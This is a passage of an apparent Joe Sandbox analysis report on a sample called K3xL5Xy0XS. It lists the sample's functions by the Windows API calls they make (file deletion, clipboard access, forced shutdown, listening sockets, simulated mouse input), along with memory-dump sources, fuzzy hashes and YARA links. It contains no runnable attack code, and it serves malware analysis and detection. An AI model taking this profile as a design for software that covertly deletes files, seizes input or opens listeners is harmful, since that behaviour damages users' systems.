FindNextFileW.KERNEL32(00000000,00000010), ref: 00239772
FindClose.KERNEL32(00000000), ref: 0023977F
FindClose.KERNEL32(00000000), ref: 0023978F

Strings

*.*, xrefs: 002396F5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 90643912e11396003d8db8b3b46e98e3bf35226e65722948a08c8884effd0029
Instruction ID: 6fd7a800a570d45c6c182c549a669e8f77afefb59c677ecdb7511ebafb07da0b
Opcode Fuzzy Hash: 90643912e11396003d8db8b3b46e98e3bf35226e65722948a08c8884effd0029
Instruction Fuzzy Hash: 9B31D2B256171A6EDB10AFB4EC4DAEE77AC9F0A325F104056E905E20E0EBB0DD948E14

Function 0023979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002397BE
FindNextFileW.KERNEL32(00000000,?), ref: 00239819
FindClose.KERNEL32(00000000), ref: 00239824
FindFirstFileW.KERNEL32(*.*,?), ref: 00239840
SetCurrentDirectoryW.KERNEL32(?), ref: 00239890
SetCurrentDirectoryW.KERNEL32(00286B7C), ref: 002398AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 002398B8
FindClose.KERNEL32(00000000), ref: 002398C5
FindClose.KERNEL32(00000000), ref: 002398D5

Part of subcall function 0022DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0022DB00

Strings

*.*, xrefs: 0023983B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 14d4c862b9a2f2942270fb0314d57f033f6374a86ce7341250bdecf7d71c2689
Instruction ID: ea2a8a2828ca790cd1f298d585e9803bd728bd3f58ea514f04bc35f9c6ece768
Opcode Fuzzy Hash: 14d4c862b9a2f2942270fb0314d57f033f6374a86ce7341250bdecf7d71c2689
Instruction Fuzzy Hash: AA31C37251171A6EDB10AFB4EC48ADE77AC9F47325F204156E910E20E1EBB0DDA5CF24

Function 00238195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00238257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00238267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00238273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00238310
SetCurrentDirectoryW.KERNEL32(?), ref: 00238324
SetCurrentDirectoryW.KERNEL32(?), ref: 00238356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0023838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00238395

Strings

*.*, xrefs: 0023839B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 6b6dbde0fc1742bcd09d3107c1d56340aca584101882dfbe88132bb39a18a90f
Instruction ID: 4b817f86dd3923c9289d81199ae4e97a9daa72dda7dcd67915c7695edc51ced0
Opcode Fuzzy Hash: 6b6dbde0fc1742bcd09d3107c1d56340aca584101882dfbe88132bb39a18a90f
Instruction Fuzzy Hash: DA6189B21183459FCB10EF60D845AAEB3E8FF99310F04491DF989C7251EB31E915CB92

Function 0022D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2

Part of subcall function 0022E199: GetFileAttributesW.KERNEL32(?,0022CF95), ref: 0022E19A

FindFirstFileW.KERNEL32(?,?), ref: 0022D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0022D1DD
MoveFileW.KERNEL32(?,?), ref: 0022D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0022D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0022D237

Part of subcall function 0022D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0022D21C,?,?), ref: 0022D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0022D253
FindClose.KERNEL32(00000000), ref: 0022D264

Strings

\*.*, xrefs: 0022D0CD, 0022D0D6, 0022D0EB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 0f9a6d9c5801cfdca72004c9ff6d9b4d682cc58372520855f5ea143a5e817d53
Instruction ID: d0d31629c9807f080ae1602aa987ea06044a5df68c582837eaaa8f870e895831
Opcode Fuzzy Hash: 0f9a6d9c5801cfdca72004c9ff6d9b4d682cc58372520855f5ea143a5e817d53
Instruction Fuzzy Hash: 80615D3180121DAECF15EFE0E956EEDB775AF25304F204169E80677192EB30AF19DB60

Function 0023ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0023ED91
EmptyClipboard.USER32 ref: 0023ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0023EDAC
CloseClipboard.USER32 ref: 0023EEA3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 8eae5e7b5116930349c3784647fc4fb673d1853b9b3dc1032b6e3a0efb2c1ddf
Instruction ID: d08497596723886344f294c3c4224139de4add8d2aac48634efe6e900b04619e
Opcode Fuzzy Hash: 8eae5e7b5116930349c3784647fc4fb673d1853b9b3dc1032b6e3a0efb2c1ddf
Instruction Fuzzy Hash: B641EFB0214312AFE710CF15E888F1ABBE4EF44329F15C09DE8198B6A2C731ED42CB80

Function 0022E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022170D
Part of subcall function 002216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022173A
Part of subcall function 002216C3: GetLastError.KERNEL32 ref: 0022174A

ExitWindowsEx.USER32(?,00000000), ref: 0022E932

Strings

SeShutdownPrivilege, xrefs: 0022E902
, xrefs: 0022E920
, xrefs: 0022E95C
@, xrefs: 0022E925

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 04ba00aede11749a556a344ea3e88a8e55346055281eaf3085ebbee5424d8b18
Instruction ID: 97d34b9153c96024b0baf6fe17ea82740cd472572d61664f25a4ec295d83c54b
Opcode Fuzzy Hash: 04ba00aede11749a556a344ea3e88a8e55346055281eaf3085ebbee5424d8b18
Instruction Fuzzy Hash: D401A272630331BFEF542AF4BC8AFBF725C9714751F260422FC02E21D2E5A05CA49694

Function 00241204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00241276
WSAGetLastError.WSOCK32 ref: 00241283
bind.WSOCK32(00000000,?,00000010), ref: 002412BA
WSAGetLastError.WSOCK32 ref: 002412C5
closesocket.WSOCK32(00000000), ref: 002412F4
listen.WSOCK32(00000000,00000005), ref: 00241303
WSAGetLastError.WSOCK32 ref: 0024130D
closesocket.WSOCK32(00000000), ref: 0024133C

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: fe90bb9da302e6ecb2e658c097a36255eb54e04b664cc36c125bd6b6e32e67b0
Instruction ID: d51963bb373b0957625f553bc9b6eafd247cf9a1a279c6c0009fdfbbf9920b1f
Opcode Fuzzy Hash: fe90bb9da302e6ecb2e658c097a36255eb54e04b664cc36c125bd6b6e32e67b0
Instruction Fuzzy Hash: 05418F316002119FD714DF64D489B2ABBE5AF56318F288188E8568F3D6C7B1EC91CBE1

Function 0022D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2

Part of subcall function 0022E199: GetFileAttributesW.KERNEL32(?,0022CF95), ref: 0022E19A

FindFirstFileW.KERNEL32(?,?), ref: 0022D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0022D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0022D481
FindClose.KERNEL32(00000000), ref: 0022D498
FindClose.KERNEL32(00000000), ref: 0022D4A1

Strings

\*.*, xrefs: 0022D3F2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 15e3f1cead4803ef8d3bcf2c8a828cfbd40c01cc7b0db7fe97b40e31957f16c4
Instruction ID: f2e1481f23b4939776ab1653487172c7c873dd1693860ba26c39d1f319d9d3fc
Opcode Fuzzy Hash: 15e3f1cead4803ef8d3bcf2c8a828cfbd40c01cc7b0db7fe97b40e31957f16c4
Instruction Fuzzy Hash: 0A318F31018355AFC301EF60E856DAF77A8BEB1314F904A1DF4D593191EB30EA19CB66

Function 001FE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001FE645

Strings

1#IND, xrefs: 001FF83D
1#SNAN, xrefs: 001FF844
1#QNAN, xrefs: 001FF84B
1#INF, xrefs: 001FF852

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e564f05ee1d861cebcb36325cc8fcf3047039842d6d2f936165ad305dd494c9c
Instruction ID: 524396ee27dacdac76b44b9dcf4bffe387650c66f6d52e38e71aad917dea39dd
Opcode Fuzzy Hash: e564f05ee1d861cebcb36325cc8fcf3047039842d6d2f936165ad305dd494c9c
Instruction Fuzzy Hash: DFC22971E0862C8FDB29CE289D407EAB7B5EF44305F1541EAD94DE7251E7B4AE828F40

Function 0023648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002364DC
CoInitialize.OLE32(00000000), ref: 00236639
CoCreateInstance.OLE32(0025FCF8,00000000,00000001,0025FB68,?), ref: 00236650
CoUninitialize.OLE32 ref: 002368D4

Strings

.lnk, xrefs: 002364BA, 00236524, 002365E0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: f4ee920d08b1942bd1faa7428d45ce5cdde05fdcc30c7a0c73165f528cf1e279
Instruction ID: 576b9963a7c6f8fe7683deffe60ac4351fce3474f01b2d5828a4a6d473231478
Opcode Fuzzy Hash: f4ee920d08b1942bd1faa7428d45ce5cdde05fdcc30c7a0c73165f528cf1e279
Instruction Fuzzy Hash: 01D14A71518201AFC304EF24C885E6BB7E9FFA9704F50896DF5958B291EB70ED09CB92

Function 002422DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002422E8

Part of subcall function 0023E4EC: GetWindowRect.USER32(?,?), ref: 0023E504

GetDesktopWindow.USER32 ref: 00242312
GetWindowRect.USER32(00000000), ref: 00242319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00242355
GetCursorPos.USER32(?), ref: 00242381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002423DF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: a8290f3bf0e9d4f989372fa25e42b4244de7c3538ae0f5859cf1dbfbab1437cc
Instruction ID: 2ec5026c979a2f3c0643878ebbebe69f47002952e7041d0a486a474125ffcac8
Opcode Fuzzy Hash: a8290f3bf0e9d4f989372fa25e42b4244de7c3538ae0f5859cf1dbfbab1437cc
Instruction Fuzzy Hash: 37312072104316AFCB20DF55DC09B9BBBA9FFC8714F400919F984A7181EB34EA18CB96

Function 00239B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00239B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00239C8B

Part of subcall function 00233874: GetInputState.USER32 ref: 002338CB
Part of subcall function 00233874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00233966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00239BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00239C75

Strings

*.*, xrefs: 00239B5D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: d33f88fcf396db5602f1574c7022f26d1805d8d7ffc5041d8bbf9c05117ade60
Instruction ID: 7d8ff9a1732d4af50ff4fc92115504303215c7c8a56d18486f2a8c4cbb0ce6f6
Opcode Fuzzy Hash: d33f88fcf396db5602f1574c7022f26d1805d8d7ffc5041d8bbf9c05117ade60
Instruction Fuzzy Hash: 7D41D3B191420B9FCF10DF64D889AEEBBB4FF1A315F24445AE805A3191EB709E94CF60

Function 001D997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 001D9A4E
GetSysColor.USER32(0000000F), ref: 001D9B23
SetBkColor.GDI32(?,00000000), ref: 001D9B36

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 14c6e88ef0bead04412550f193ece941e265fae3668d7b41e7e090a6c25c71bf
Instruction ID: caa4e9bcf361095519dc8819e08c8092d53e70acd5e4c202fd1ee1f4f755d998
Opcode Fuzzy Hash: 14c6e88ef0bead04412550f193ece941e265fae3668d7b41e7e090a6c25c71bf
Instruction Fuzzy Hash: 20A13771128541BFE728AE3D9C48EBB26ADDB92340F16020BF402C77D1DB359DA1D675

Function 00241806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0024304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0024307A
Part of subcall function 0024304E: _wcslen.LIBCMT ref: 0024309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0024185D
WSAGetLastError.WSOCK32 ref: 00241884
bind.WSOCK32(00000000,?,00000010), ref: 002418DB
WSAGetLastError.WSOCK32 ref: 002418E6
closesocket.WSOCK32(00000000), ref: 00241915

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: d3b0ac7bd6b2a9565eda45315a0992fa2f9b1b0852447175b144b6ba4b40b745
Instruction ID: 07d883a12ee1402dd5025993310426dab45cf1c1e0bdaea21dbb0a8535c150c4
Opcode Fuzzy Hash: d3b0ac7bd6b2a9565eda45315a0992fa2f9b1b0852447175b144b6ba4b40b745
Instruction Fuzzy Hash: 2751B471A00210AFEB15AF24D88AF2A77E5AB58718F14805CF9065F3D3D771ED51CBA1

Function 00251C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00251CC0
IsWindowEnabled.USER32 ref: 00251CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00251CDB
IsIconic.USER32 ref: 00251CE9
IsZoomed.USER32 ref: 00251CF7

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 6a2797319577c2c2e6c16e3d990594ee6972b60759438644430a979021223713
Instruction ID: a4ea424070adefa3eae84ad4e8d99ecde74be8e3c75bec7aaefea1666c1ed0e0
Opcode Fuzzy Hash: 6a2797319577c2c2e6c16e3d990594ee6972b60759438644430a979021223713
Instruction Fuzzy Hash: AC21D6317502015FD7208F1AD884F267BA5EF95317F18805DEC458B351D772EC66CB99

Function 001C8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 001C813C
VUUU, xrefs: 001C843C
VUUU, xrefs: 001C83E8
VUUU, xrefs: 00205DF0
VUUU, xrefs: 001C83FA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 9ab4b670afd77cb5eca1a7ff6346393c85e416046946b264c2467a8962243a20
Instruction ID: 06fc555b53f55e22fb4bd46e10d1994c0cf2df23e4e9e851ef4652de78383d2e
Opcode Fuzzy Hash: 9ab4b670afd77cb5eca1a7ff6346393c85e416046946b264c2467a8962243a20
Instruction Fuzzy Hash: EFA27370E1062ACBDF24CF58C884BAEB7B1BF64314F15819AD815A7285DB74DDA1CF50

Function 00228298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002282AA

Strings

(, xrefs: 002282F0
tb(, xrefs: 002284F4
|, xrefs: 002282DA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
